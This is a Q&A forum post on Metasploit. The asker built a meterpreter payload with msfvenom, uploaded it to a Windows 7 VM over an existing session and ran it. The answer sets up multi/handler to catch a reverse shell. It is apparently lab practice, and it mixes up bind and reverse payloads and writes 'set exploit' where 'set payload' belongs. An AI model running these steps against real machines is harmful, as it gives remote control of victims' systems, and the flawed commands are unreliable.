How to connect to a meterpreter session opened manually on the target machine

Question

I am trying to exploit a Windows 7 VM using metasploit. I was able to open a java meterpreter session and I want to access a native meterpreter. To do so I exported a meterpreter/reverse_tcp payload to an .exe using msfvenom:

msfvenom -p windows/meterpreter_bind_tcp LPORT=5555 -f exe > bindtcp5555.exe

I then uploaded that executable to the target machine using the java meterpreter and started the process using a native shell:

meterpreter> upload ./bindtcp5555.exe
...
meterpreter> shell
...
C:.../Desktop> start bindtcp5555.exe

I confirmed that the target is listening on port 5555 using nmap. But now I am stuck, how do I connect to that meterpreter session using msfconsole?

Answer 1

I received some help on this offline, and I will post my solution here. I was pointed to this article: https://www.sciencedirect.com/topics/computer-science/meterpreter-shell

Essentially, you need to use the module multi/handler to open a session with the remote meterpreter session. Furthermore, I misunderstood the LPORT option: it is the port on the attacking machine that the remote meterpreter will report back to. You also need to set the LHOST option to the attacking computer's IP address.

After uploading the exe to the victim and starting the process, run multi/handler from the attacker:

msf5> use multi/handler
msf5 exploit(multi/handler)> set exploit windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler)> set LHOST <HOST_IP>
msf5 exploit(multi/handler)> set LPORT <HOST_PORT>
msf5 exploit(multi/handler)> set ExitOnSession False
msf5 exploit(multi/handler)> exploit -j

*note, it is important that HOST_IP and HOST_PORT match what you had set in the payload when using msfvenom.

This should open a meterpreter session which can be accessed using sessions -i N (where N is the session number).